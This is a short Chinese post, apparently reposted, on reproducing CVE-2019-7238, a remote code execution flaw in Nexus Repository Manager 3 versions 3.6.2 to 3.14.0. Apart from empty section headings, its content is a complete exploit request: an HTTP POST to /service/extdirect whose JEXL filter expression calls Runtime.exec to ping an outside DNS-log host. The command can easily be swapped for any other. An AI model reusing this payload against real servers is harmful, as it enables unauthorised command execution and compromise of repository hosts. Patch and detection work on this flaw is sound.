Nexus Repository Manager 3 RCE CVE-2019-7238（nexus是什么意思）

Nexus Repository Manager 3 RCE CVE-2019-7238（nexus是什么意思）

Nexus Repository Manager 3 RCE CVE-2019-7238

0x00 参考链接

0x01 影响版本

Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版本

0x02 复现环境搭建

0x03漏洞复现

POST /service/extdirect HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost:8081/ X-Nexus-UI: true NX-ANTI-CSRF-TOKEN: 2b482005-c1c3-48b6-942f-70e5a5f6d773 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 398 Cookie: pgv_pvi=5464665088; _ga=GA1.1.452998845.1550474860; _gid=GA1.1.653552585.1550474860; NX-ANTI-CSRF-TOKEN=2b482005-c1c3-48b6-942f-70e5a5f6d773; NXSESSIONID=7bd0f929-d72f-407a-bc17-76c2dd98c6cf Connection: close {"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('ping t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":11}

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。